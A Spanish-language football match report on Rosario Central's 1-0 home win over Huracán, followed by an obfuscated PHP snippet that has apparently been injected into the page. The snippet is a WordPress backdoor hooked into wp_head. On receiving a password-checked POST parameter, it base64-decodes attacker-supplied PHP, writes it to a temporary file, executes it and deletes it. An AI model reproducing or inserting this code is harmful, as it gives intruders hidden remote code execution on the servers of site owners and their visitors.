Un golazo de Campaz estiró la racha feliz de Rosario Central en Arroyito y hundió a Huracán

Rosario Central derrotó a Huracán 1-0, en el Gigante de Arroyito, por la octava fecha de la Zona A de la Copa de la Liga Profesional. Un golazo de Jaminton Campaz le permitió al equipo de Miguel Russo sumó tres puntos más y extender su racha invicta de local a 25 partidos.

El Globo, por su parte, vuelve a complicarse en la tabla anual que definirá un descenso a la Primera Nacional. El equipo de Parque Patricios se estancó en 38 puntos y Gimnasia y Esgrima (visita el domingo a Instituto) y Vélez Sarsfield (recibe el lunes a Atlético Tucumán) están uno debajo y con un partido menos jugado.

En un primer tiempo parejo y sin demasiada profundidad, Rosario Central manejó mejor la pelota y fue más preciso, pero Huracán tuvo una clara chance con un frentazo de Walter Mazzanti que tapó Jorge Fatura Broun.

A poco de finalizar ese período inicial, Jaminton Campaz tiró una pared con Maximiliano Lovera y al recibir la devolución definió con alta categoría picando la pelota para poner el 1 a 0, a los 42 minutos.

En el segundo tiempo, el Canalla tuvo el protagonismo y el control, pero Huracán desaprovechó dos netas situaciones, ambas con Mazzanti como protagonista: en la primera llegó sólo y disparó débil a las manos de Broun y en la otra se demoró y le permitió a Alan Rodriguez despejar.

En tiempo de descuento fue expulsado Lucas Carrizo y poco después el técnico visitante, Diego Martinez por su airadas quejas por la tarjeta roja -correcta decisión de Fernando Rapallini, porque el central de Huracán le pegó un codazo a Fabricio Oviedo- de su defensor.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}